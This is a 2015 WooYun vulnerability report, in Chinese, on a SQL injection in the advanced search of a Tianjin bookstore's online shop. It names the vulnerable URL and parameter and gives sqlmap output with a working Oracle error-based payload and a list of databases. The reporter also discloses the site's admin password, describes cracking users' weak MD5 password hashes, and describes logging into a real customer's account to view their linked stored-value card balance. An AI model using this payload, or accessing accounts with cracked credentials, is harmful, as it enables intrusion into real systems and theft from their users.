当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132713

漏洞标题:天津图书大厦网上购书“天添网”可sql注入使6万多用户账户余额不保!

相关厂商:天津图书大厦

漏洞作者: 未出现的风景

提交时间:2015-08-10 17:25

修复时间:2015-09-24 17:26

公开时间:2015-09-24 17:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

天津图书大厦网上购书“天添网”存在POST型SQL注入,可发现网站管理员admin密码为haochangdemima,以及注册用户敏感信息(包括用户名,密码,手机号,邮箱等等),虽然用户密码用了MD5加密,但是一堆堆的弱密码啊,cmd5解密好方便啊,一堆123456的密码。而绑定了“书香卡”的用户更惨了!钱随便被盗花啊。。。。

详细说明:

这个漏洞是在首页的【高级搜索】中!没有进行很好的过滤,看着不起眼儿,但是发现了就能进行注入了啊!

1.png


输入一个单引号,报错了,发现是ORACLE数据库。

2.png


Place: POST
Parameter: pm
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: pm=444' AND 9230=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(121)||CHR(113)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (9230=9230) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(111)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'JQYy' LIKE 'JQYy&flid=0
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: pm
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: pm=444' AND 9230=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(121)||CHR(113)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (9230=9230) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(111)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'JQYy' LIKE 'JQYy&flid=0
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
available databases [17]:
[*] COLLEGE
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXCHANGE
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


减少篇幅,就放这一个列举数据库的代码啦。

漏洞证明:

http://www.tjbb.com/icarttw/search/searchdy (POST)
pm=444&flid=0


1.是DBA,但是oracle说不支持os-shell,我也没找到管理后台,新手一枚,还望大牛们指点

isdba.png


2.管理员的密码是haochangdemima,让我在笑一会。。。

admin.png


3.有6万多注册用户呢

count.png


4.这是用户信息,密码加密了

3.png


5.用CMD5在线解密一下,就用第一个做实验了

passwd1.png


好弱的密码,后面连着那几个一样的都是123456
6.用用户名密码登进去看一下好了

login.png


地址啊什么的就都泄露了,然后书香卡还绑定了,虽然这个人的没啥钱,但是别的用户有啊,多危险!

shuxiangka.png


比如,下面这个!还有三百多块钱呢!能卖好多书吧,不知道电器能不能买。

money.png


修复方案:

我觉得好严重,难以信任的网购平台啊,赶快过滤吧。

版权声明:转载请注明来源 未出现的风景@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝